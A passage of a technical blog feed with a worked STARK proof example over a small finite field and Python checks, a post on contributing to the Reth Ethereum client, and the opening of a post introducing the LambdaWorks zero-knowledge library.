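print(H1, H2)     # [4, 0, 15] [11, 9] -> H_1(y) = 15y^2 + 4, H_2(y) = 9y + 11
```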
&lt;h2 id=&quot;sampling-outside-the-original-domain&quot;&gt;Sampling outside the original domain&lt;&#x2F;h2&gt;
&lt;p&gt;The verifier now chooses a random point, $z$, outside the trace interpolation and evaluation domains. In our example, the points outside those are $\{ 2, 8, 9 , 15 \}$. Suppose the verifier selected $z = 8$. Then,&lt;br &#x2F;&gt;
$H ( 8 ) = 10$&lt;br &#x2F;&gt;
with each part being&lt;br &#x2F;&gt;
$H_1 (8^2) = 6$&lt;br &#x2F;&gt;
$H_2 (8^2) = 9$&lt;br &#x2F;&gt;
We need to check that the composition polynomial and trace elements are related. To be able to evaluate the constraints numerically, we need both $t(z)$ and $t(gz)$ (remember, $g$ is the generator of the trace interpolating domain) since we have to calculate $P(x,y)$. The necessary values are:&lt;br &#x2F;&gt;
$t(8) = 16$&lt;br &#x2F;&gt;
$t(13 \times 8) = t(2) = 14$&lt;&#x2F;p&gt;
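&lt;p&gt;These out-of-domain evaluations are easy to check numerically:&lt;&#x2F;p&gt;

```python
# Out-of-domain sampling at z = 8 over F_17: evaluate H, its parts, and the
# trace openings the verifier will need.
P = 17

def ev(poly, x, p):
    return sum(c * pow(x, k, p) for k, c in enumerate(poly)) % p

H  = [4, 11, 0, 9, 15]   # 15x^4 + 9x^3 + 11x + 4
H1 = [4, 0, 15]          # H_1(y) = 15y^2 + 4
H2 = [11, 9]             # H_2(y) = 9y + 11
t  = [6, 16, 2, 13]      # 13x^3 + 2x^2 + 16x + 6

z = 8
print(ev(H, z, P))                        # 10
print(ev(H1, z * z % P, P))               # 6
print(ev(H2, z * z % P, P))               # 9
print(ev(t, z, P), ev(t, 13 * z % P, P))  # 16 14
# Consistency: H(z) = H_1(z^2) + z * H_2(z^2)
print((ev(H1, z * z % P, P) + z * ev(H2, z * z % P, P)) % P)  # 10
```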
&lt;h2 id=&quot;why-does-the-verifier-need-this&quot;&gt;Why does the verifier need this?&lt;&#x2F;h2&gt;
&lt;p&gt;The verifier can now check that the trace and composition polynomial are related:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;$p_1 (8) = t(8) - 3 = 13$&lt;&#x2F;li&gt;
&lt;li&gt;$Z_1 (8) = 8 - 1 = 7$&lt;&#x2F;li&gt;
&lt;li&gt;$C_1 (8) = p_1 (8) &#x2F; Z_1 (8) = 13 \times 7^{-1} = 14$&lt;&#x2F;li&gt;
&lt;li&gt;$C_1 (8) (1\times 8^2 +3) = 3$&lt;&#x2F;li&gt;
&lt;li&gt;$p_2 (8) = t(2) - t(8)^2 = 13$&lt;&#x2F;li&gt;
&lt;li&gt;$Z_2 (8) = 8$&lt;&#x2F;li&gt;
&lt;li&gt;$C_2 (8) = p_2 (8)&#x2F; Z_2 (8) = 13 \times 8^{-1} = 8$&lt;&#x2F;li&gt;
&lt;li&gt;$C_2 (8) (2\times 8 +4) = 7$&lt;&#x2F;li&gt;
&lt;li&gt;$H (8) = C_1 (8)(1\times 8^2+3) + C_2 (8)(2\times 8+4) = 3 + 7 = 10$&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;We see that the evaluation of $H_1 (z^2)$ and $H_2 (z^2)$ matches the calculation of $H(z)$ from the trace elements.&lt;&#x2F;p&gt;
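&lt;p&gt;The same check can be scripted with modular inverses (the values $t(8)=16$ and $t(2)=14$ are the openings sent by the prover):&lt;&#x2F;p&gt;

```python
# The verifier's consistency check at z = 8, over F_17.
P = 17
t_z, t_gz = 16, 14             # t(8) and t(13*8) = t(2)

p1 = (t_z - 3) % P             # 13
Z1 = (8 - 1) % P               # 7
C1 = p1 * pow(Z1, -1, P) % P   # 14
term1 = C1 * (1 * 8**2 + 3) % P              # 3

p2 = (t_gz - t_z**2) % P       # 13
Z2 = (8 - 1) * (8 - 13) * (8 - 16) % P       # 8
C2 = p2 * pow(Z2, -1, P) % P   # 8
term2 = C2 * (2 * 8 + 4) % P                 # 7

print((term1 + term2) % P)     # 10, matching H(8)
```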
&lt;h2 id=&quot;ensuring-the-prover-does-not-cheat&quot;&gt;Ensuring the prover does not cheat&lt;&#x2F;h2&gt;
&lt;p&gt;How does the verifier check that the values we passed are indeed the trace and composition polynomial evaluations at $z$ and $gz$? We can use the same trick: if the polynomial $y(x)$ evaluates to $b$ at $x=a$, then $y(x) - b$ is divisible by $x - a$. We form the DEEP composition polynomial,&lt;br &#x2F;&gt;
$$ P_0 (x) = \gamma_1\frac{t(x)-t(z)}{x-z} + \gamma_2 \frac{t(x)- t(gz)}{x-gz}+\gamma_3 \frac{H_1 (x^2) - H_1 (z^2) }{x-z } + \gamma_4 \frac{H_2 (x^2) - H_2 (z^2) }{x - z}$$&lt;br &#x2F;&gt;
Let’s calculate each term&lt;br &#x2F;&gt;
$$\frac{t(x)-t(8)}{x-8} = 13(x+13)(x+3) = 13 (x^2 + 16 x + 5)$$&lt;br &#x2F;&gt;
$$\frac{t(x)-t(2)}{x-2} = 13(x+8)(x+2) = 13 (x^2 + 10 x + 16)$$&lt;br &#x2F;&gt;
$$\frac{H_1 (x^2) - H_1 (8^2) }{x-8 } = 15(x+15)(x+8)(x+2) $$&lt;br &#x2F;&gt;
$$\frac{H_2 (x^2) - H_2 (8^2) }{x-8 } = 9(x+8) $$&lt;&#x2F;p&gt;
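&lt;p&gt;Each term can be verified to be an exact division: every numerator vanishes at the opened point, so synthetic division by the corresponding linear factor leaves remainder $0$ (note that $H_1(x^2)$, viewed as a polynomial in $x$, takes the value $H_1(z^2)$ at $x=z$, so the $H$ parts are divided by $x-8$):&lt;&#x2F;p&gt;

```python
# DEEP quotients over F_17: all four numerators divide exactly.
P = 17
t    = [6, 16, 2, 13]      # t(x)
H1x2 = [4, 0, 0, 0, 15]    # H_1(x^2) = 15x^4 + 4
H2x2 = [11, 0, 9]          # H_2(x^2) = 9x^2 + 11

def divide_linear(poly, a, p):
    """Divide poly (low-degree first) by (x - a); return (quotient, remainder)."""
    q = [0] * (len(poly) - 1)
    carry = 0
    for k in reversed(range(1, len(poly))):
        carry = (poly[k] + a * carry) % p
        q[k - 1] = carry
    return q, (poly[0] + a * carry) % p

def shift(poly, b, p):     # poly(x) - b
    out = poly[:]
    out[0] = (out[0] - b) % p
    return out

z = 8
print(divide_linear(shift(t, 16, P), z, P))           # ([14, 4, 13], 0)
print(divide_linear(shift(t, 14, P), 13 * z % P, P))  # ([4, 11, 13], 0)
print(divide_linear(shift(H1x2, 6, P), z, P))         # ([13, 8, 1, 15], 0)
print(divide_linear(shift(H2x2, 9, P), z, P))         # ([4, 9], 0)
```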
&lt;p&gt;Each term is a polynomial, so the linear combination is also a polynomial. By applying the FRI protocol, we must prove to the verifier that this is close to a low-degree polynomial. The polynomial is (using $\gamma_i = 1$),&lt;br &#x2F;&gt;
$P_0 ( x ) = 15 x^3 + 15 x + 1$&lt;br &#x2F;&gt;
We can commit to this polynomial using $D_0$ and forming a Merkle tree,&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$x$&lt;&#x2F;th&gt;&lt;th&gt;$P_0(x)$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;9&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;13&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;11&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;14&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;td&gt;15&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;12&lt;&#x2F;td&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;td&gt;16&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Splitting into odd and even terms,&lt;br &#x2F;&gt;
$xP_{0,odd} (x^2) = 15 x^3 + 15 x$&lt;br &#x2F;&gt;
$P_{0,even} (x^2) = 1$&lt;br &#x2F;&gt;
The verifier samples $\beta_0 = 4$. Then,&lt;br &#x2F;&gt;
$P_1 (y=x^2) = 9y +10$&lt;br &#x2F;&gt;
The domain is given by points of the form $y=x^2$, so $D_1 = \{ 9, 15, 8, 2\}$. The leaves of the Merkle tree are&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$y$&lt;&#x2F;th&gt;&lt;th&gt;$P_1(y)$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;9&lt;&#x2F;td&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;15&lt;&#x2F;td&gt;&lt;td&gt;9&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;14&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;11&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;We repeat the process,&lt;br &#x2F;&gt;
$yP_{1,odd} (y^2) = 9y$&lt;br &#x2F;&gt;
$P_{1,even} (y^2) = 10$&lt;br &#x2F;&gt;
The verifier samples $\beta_1 = 3$&lt;br &#x2F;&gt;
$P_2 (z=y^2) = 3$.&lt;br &#x2F;&gt;
And we end up with a constant polynomial. The second domain is $D_2 = \{13, 4\}$.&lt;&#x2F;p&gt;
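&lt;p&gt;The two FRI folds can be reproduced with a small helper that splits a polynomial into its even and odd parts and recombines them with the verifier's challenge:&lt;&#x2F;p&gt;

```python
# One FRI fold over F_17: P_next(y) = P_even(y) + beta * P_odd(y), y = x^2.
P = 17

def fold(poly, beta, p):
    even, odd = poly[0::2], poly[1::2]
    n = max(len(even), len(odd))
    even = even + [0] * (n - len(even)); odd = odd + [0] * (n - len(odd))
    return [(e + beta * o) % p for e, o in zip(even, odd)]

P0 = [1, 15, 0, 15]       # P_0(x) = 15x^3 + 15x + 1, low-degree first
P1 = fold(P0, 4, P)
print(P1)                 # [10, 9] -> P_1(y) = 9y + 10
P2 = fold(P1, 3, P)
print(P2)                 # [3] -> a constant polynomial
```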
&lt;h2 id=&quot;checking-fri-layers&quot;&gt;Checking FRI layers&lt;&#x2F;h2&gt;
&lt;p&gt;To finish the proof, the verifier chooses an element from $D_0$, and we have to send all the values needed to reconstruct the evaluations of the composition polynomial and the FRI steps. Say the verifier chooses $x=10$, which corresponds to index $1$. For each FRI layer, we must pass the evaluations at $x$ and $-x$, together with the trace polynomial evaluated at $x$ and $gx$.&lt;&#x2F;p&gt;
&lt;p&gt;From $P_0(x)$ we pass the values $P_0(x=10)=4$ and $P_0(x=7)=15$, together with their authentication paths.&lt;br &#x2F;&gt;
From $P_1(x)$ we pass the values $P_1(x=15)=9$ and $P_1(x=2)=11$ and their authentication paths.&lt;br &#x2F;&gt;
From $P_2(x)$, we only need the constant value of $3$.&lt;&#x2F;p&gt;
&lt;p&gt;Checking the correctness of FRI requires verifying that each value corresponds to its Merkle tree and the colinearity test,&lt;br &#x2F;&gt;
$$P_{i+1}(x^2)=\frac{P_i(x) + P_i(-x)}{2}+\beta_i \frac{P_i (x) - P_i (-x)}{2x}$$&lt;br &#x2F;&gt;
Let’s check the jump from each layer:&lt;br &#x2F;&gt;
$$P_1(15) = 9 = \frac{P_0(10) + P_0(7)}{2} + 4 \frac{P_0 (10) - P_0 (7)}{2\times 10}$$&lt;br &#x2F;&gt;
We can see that&lt;br &#x2F;&gt;
$$\frac{P_0(10) + P_0(7)}{2} = 1$$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$$ 4 \frac{P_0 (10) - P_0 (7)}{2\times 10} = 8$$&lt;&#x2F;p&gt;
&lt;p&gt;Let’s jump onto the next layer,&lt;br &#x2F;&gt;
$$P_{2}(y^2)=\frac{P_1(y) + P_1(-y)}{2}+\beta_1 \frac{P_1 (y) - P_1 (-y)}{2y}$$&lt;br &#x2F;&gt;
Replacing the values,&lt;br &#x2F;&gt;
$$P_{2}(y^2) = 3$$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$$ \frac{P_1(15) + P_1(2)}{2} = 10$$&lt;br &#x2F;&gt;
$$ 3\frac{P_1 (15) - P_1 (2)}{2\times 15} = 10$$&lt;br &#x2F;&gt;
Adding them,&lt;br &#x2F;&gt;
$$ 10 + 10 = 20 \equiv 3 = P_2(4)$$&lt;br &#x2F;&gt;
which completes the check. You can try selecting other indices and verifying the proof.&lt;&#x2F;p&gt;
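&lt;p&gt;The colinearity test is easy to script with modular inverses (the opened values are taken from the tables above):&lt;&#x2F;p&gt;

```python
# Verifier's colinearity checks over F_17:
# P_{i+1}(x^2) = (P_i(x) + P_i(-x))/2 + beta_i * (P_i(x) - P_i(-x))/(2x).
P = 17

def fold_check(px, pmx, x, beta, p):
    even = (px + pmx) * pow(2, -1, p) % p
    odd = (px - pmx) * pow(2 * x, -1, p) % p
    return (even + beta * odd) % p

# Layer 0 -> 1: P_0(10) = 4, P_0(7) = 15 (note 7 = -10 mod 17), beta_0 = 4
print(fold_check(4, 15, 10, 4, P))   # 9, matching P_1(15)
# Layer 1 -> 2: P_1(15) = 9, P_1(2) = 11 (note 2 = -15 mod 17), beta_1 = 3
print(fold_check(9, 11, 15, 3, P))   # 3, matching P_2(4)
```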
&lt;p&gt;The only remaining check shows that the trace and composition polynomial are related. We leave it as a challenge (the answer will appear shortly)&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;This post covered a pen-and-paper example of computational integrity using STARKs. We chose a sequence where each element is the square of the previous one, starting from 3. We stated the problem, interpreted the computation as evaluating a polynomial over a suitable domain, and performed Lagrange interpolation. After that, we enforced the constraints over the execution trace and obtained the composition polynomial. To improve soundness, we forced the prover to evaluate at a point $z$ outside the domain and showed that the trace and composition polynomial are related. Then, we created a rational function that ensured the prover did not cheat and sent the correct values. If the prover is honest, the resulting function is a polynomial, and we proved this by showing that it is close to a low-degree polynomial using FRI. If you want to try more complicated examples, follow the updates at Lambdaworks.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Our small contribution to Paradigm’s Reth to diversify Ethereum clients</title>
          <pubDate>Mon, 06 Mar 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/our-small-contribution-to-paradigms-reth-to-diversify-ethereum-clients/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/our-small-contribution-to-paradigms-reth-to-diversify-ethereum-clients/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/our-small-contribution-to-paradigms-reth-to-diversify-ethereum-clients/">&lt;p&gt;In December, last year, we heard about &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;paradigmxyz&#x2F;reth&quot;&gt;Reth&lt;&#x2F;a&gt;, and it immediately piqued our interest. A greenfield new implementation of an Ethereum full node? Where do we sign up!?&lt;&#x2F;p&gt;
&lt;p&gt;The project, started and driven by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.twitter.com&#x2F;gakonst&quot;&gt;@gakonst&lt;&#x2F;a&gt; from Paradigm (if you haven’t heard about it yet, we encourage you to read gakonst’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.paradigm.xyz&#x2F;2022&#x2F;12&#x2F;reth&quot;&gt;introductory post&lt;&#x2F;a&gt;), aims not just to experiment with improvements to performance, safety, software reuse through modularity, and node architecture, but also to contribute to Ethereum’s stability by improving implementation diversity.&lt;&#x2F;p&gt;
&lt;p&gt;These goals strongly resonated with our values and interests: the intersection of deep technical problems, good engineering, and building jointly in the open. “Diversity” is not just a buzzword: time and time again we’ve seen how monocultures stagnate, how team composition and output benefit from integrating differing viewpoints and experiences, how the state of the art advances by integrating engineering and research, and how software projects grow stronger, instead of weaker, by having several implementations of the same thing. It’s not &lt;em&gt;just&lt;&#x2F;em&gt; “more eyeballs”, or “competition breeds excellence”. It’s an emergent property.&lt;&#x2F;p&gt;
&lt;p&gt;All this made us commit to contributing, but when we started we first had to go down a learning path: the evolution and design tradeoffs of blockchain node architectures and protocols, the nitty-gritty of implementing data structures and patterns used in crypto projects, and so on. We expected just to learn and hone our skills in this process of giving back, but were very pleased to see other benefits: other projects we were working on required something we had learned working on Reth, or vice versa. Our seniors had interesting problems to work on, and our juniors had excellent guidance in their maturation process.&lt;&#x2F;p&gt;
&lt;p&gt;Among the many fascinating things one learns when working on cryptocurrency infrastructure project internals is just how to structure such a beast. Blockchain nodes are a kind of distributed database, so they need to handle incoming requests, both to read from the node storage and to write to the transaction mempool, handle connections to peers and the protocol used to communicate with them, and manage the actual storage of the data and cryptographic data structures used to provide the features and guarantees blockchains are known for.&lt;&#x2F;p&gt;
&lt;p&gt;As mentioned elsewhere, Reth takes some cues from Akula and Erigon, which propose a different &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ledgerwatch&#x2F;erigon-book&#x2F;blob&#x2F;main&#x2F;architecture.md&quot;&gt;architecture&lt;&#x2F;a&gt; from Geth’s: again, more modular and built up out of communicating components which can be separated out into other processes or projects as needed. A key component is the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ledgerwatch&#x2F;erigon&#x2F;blob&#x2F;devel&#x2F;eth&#x2F;stagedsync&#x2F;README.md&quot;&gt;staged&lt;&#x2F;a&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;erigon.substack.com&#x2F;p&#x2F;erigon-stage-sync-and-control-flows&quot;&gt;sync&lt;&#x2F;a&gt;, a version of Go-Ethereum’s Full Sync designed with performance in mind.&lt;&#x2F;p&gt;
&lt;p&gt;This staged sync is in essence a state machine consisting of a series of stages, each of which handles one segmented part of the node’s syncing process. Each stage takes care of one well-defined task, such as downloading headers or executing transactions, persists its results to a database, and rolls forward or backward according to required changes. Each stage is thus executed once, unless an interruption or a network reorg&#x2F;unwind requires restarting or rolling back.&lt;&#x2F;p&gt;
&lt;p&gt;In Reth, the staged sync pipeline executes queued stages serially. An external component determines the tip of the chain, and the pipeline then executes each stage in order, from the current local chain tip to the external chain tip. When a stage is executed, it will run until it reaches the chain tip.&lt;&#x2F;p&gt;
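&lt;p&gt;The pipeline described above can be sketched as a small state machine. The following is a minimal, hypothetical illustration (the names and structure are ours, not Reth’s actual API): stages execute serially toward the tip, and unwind in reverse order on a reorg.&lt;&#x2F;p&gt;

```python
# Hypothetical sketch of a staged-sync pipeline; names are illustrative
# and do not correspond to Reth's real types.

class Stage:
    def __init__(self, name):
        self.name = name
        self.progress = 0  # highest block this stage has processed

    def execute(self, target):
        # Run until the stage reaches the target tip, persisting as it goes.
        self.progress = target

    def unwind(self, to_block):
        # Roll back work above `to_block` after a reorg.
        self.progress = min(self.progress, to_block)

class Pipeline:
    def __init__(self, stages):
        self.stages = stages

    def run(self, target_tip):
        # Stages run serially, each one to completion, in queue order.
        for stage in self.stages:
            stage.execute(target_tip)

    def unwind(self, to_block):
        # Unwinding happens in reverse order of execution.
        for stage in reversed(self.stages):
            stage.unwind(to_block)

pipeline = Pipeline([Stage("Headers"), Stage("Bodies"), Stage("Execution")])
pipeline.run(100)      # every stage advances to block 100
pipeline.unwind(80)    # a reorg rolls every stage back to block 80
print([s.progress for s in pipeline.stages])  # [80, 80, 80]
```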
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;paradigmxyz&#x2F;reth&#x2F;blob&#x2F;main&#x2F;crates&#x2F;stages&#x2F;src&#x2F;pipeline&#x2F;mod.rs#L28&quot;&gt;reth docs&lt;&#x2F;a&gt; for the pipeline have an excellent diagram detailing how the stages work.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;yMGxizE.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Of course, nothing is written in stone, and things may change as possible improvements are detected and implemented, and as the project takes on its own direction.&lt;&#x2F;p&gt;
&lt;p&gt;What is relevant here is how things one takes for granted need to be rethought and reimplemented in contexts like this: maintaining data consistency, providing efficient rollbacks, computing cryptographic hash states, and so on.&lt;&#x2F;p&gt;
&lt;p&gt;But at the end of the day, code rules. Here are some of the more interesting PRs we were able to contribute:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Adding a stage to the sync pipeline for calculating the chain’s state root in an incremental fashion](https:&#x2F;&#x2F;github.com&#x2F;paradigmxyz&#x2F;reth&#x2F;pull&#x2F;994)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Adaptable request timeouts](https:&#x2F;&#x2F;github.com&#x2F;paradigmxyz&#x2F;reth&#x2F;pull&#x2F;789)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Prioritizing requesting peers with low latency](https:&#x2F;&#x2F;github.com&#x2F;paradigmxyz&#x2F;reth&#x2F;pull&#x2F;835)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Adding support for prometheus metrics](https:&#x2F;&#x2F;github.com&#x2F;paradigmxyz&#x2F;reth&#x2F;pull&#x2F;474) to the [headers sync stage](https:&#x2F;&#x2F;github.com&#x2F;paradigmxyz&#x2F;reth&#x2F;pull&#x2F;498) and [txpool](https:&#x2F;&#x2F;github.com&#x2F;paradigmxyz&#x2F;reth&#x2F;pull&#x2F;584).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;As well as general tests and documentation.&lt;&#x2F;p&gt;
&lt;p&gt;We are thankful to Paradigm for spearheading this project and for allowing us to collaborate with them and the community. Managing a project like this takes time and effort.&lt;&#x2F;p&gt;
&lt;p&gt;EOF.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>LambdaWorks or how we decided to create our zkSNARKs library and a STARK prover</title>
          <pubDate>Wed, 01 Mar 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaworks-or-how-we-decided-to-created-our-zksnarks-library-and-a-stark-prover/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaworks-or-how-we-decided-to-created-our-zksnarks-library-and-a-stark-prover/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaworks-or-how-we-decided-to-created-our-zksnarks-library-and-a-stark-prover/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;We think that most ZK libraries are not yet easy to use. Most of them assume that the user has a significant cryptography background, making it hard for a newcomer to learn from them, even with all the code in front of them. We also found that some commonly used libraries have poor documentation or hard-to-follow examples for beginners. In addition, some libraries don’t follow the state-of-the-art engineering practices that are crucial to building reliable systems for production. There are many efforts, like Cairo and Noir, that don’t have these issues, but they are full-blown programming languages. We wanted a tool for building languages like those, new proving systems, or anything else we need.&lt;&#x2F;p&gt;
&lt;p&gt;So, we decided to start building our &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;LambdaWorks&lt;&#x2F;a&gt; library with the following goals in mind:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Implemented in Rust with WASM support and an FFI API in other mainstream languages&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Easy to use API&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Contains most famous proving systems (Groth16, Plonk, STARKs, Plonky2 and maybe Halo2) and recursion&#x2F;IVC (Nova, Supernova)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Allow for hardware acceleration, such as GPU and FPGA integration&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Clear documentation with different kinds of tutorials, from starters to advanced users&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Given their importance and applications, we decided to begin our library by implementing a STARK prover. We had to implement finite field arithmetic and basic cryptographic primitives, such as Merkle trees and hash functions. We will continue with elliptic curves and SNARKs.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;starks&quot;&gt;STARKs&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2018&#x2F;046.pdf&quot;&gt;STARKs&lt;&#x2F;a&gt; (scalable, transparent arguments of knowledge) are cryptographic primitives, which are a convenient means to an end. The goal we are after is computational integrity, that is, showing that a computation was performed correctly (according to a set of instructions). For example, we want to prove that we computed the first 5000 values of a sequence correctly, or we ran a given machine learning algorithm, or we processed 4000 transactions in a blockchain. STARKs provide us with a short proof of the integrity of the computation. The advantage STARKs give us is that checking the proof is much faster than performing the naïve verification (having the verifier re-execute the program).&lt;&#x2F;p&gt;
&lt;p&gt;There are many interesting resources to learn the basics of STARKs, such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;starkware.co&#x2F;stark-101&#x2F;&quot;&gt;Starkware’s STARK 101&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;aszepieniec.github.io&#x2F;stark-anatomy&#x2F;overview&quot;&gt;Anatomy of a STARK&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;andrewmilson&#x2F;ministark&quot;&gt;Ministark&lt;&#x2F;a&gt;, as well as Starkware’s blog on arithmetization (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;starkware&#x2F;arithmetization-i-15c046390862&quot;&gt;parts I&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;starkware&#x2F;arithmetization-ii-403c3b3f4355&quot;&gt;II&lt;&#x2F;a&gt;).&lt;&#x2F;p&gt;
&lt;p&gt;The STARK protocol contains the following steps:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Arithmetization&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Transformation to polynomial equations.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * FRI, which has two steps: commitment and decommitment.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;arithmetization&quot;&gt;Arithmetization&lt;&#x2F;h2&gt;
&lt;p&gt;An execution trace is a table containing $w$ columns (the registers) and $T$ rows representing each state of the system. A trace looks like this:&lt;&#x2F;p&gt;
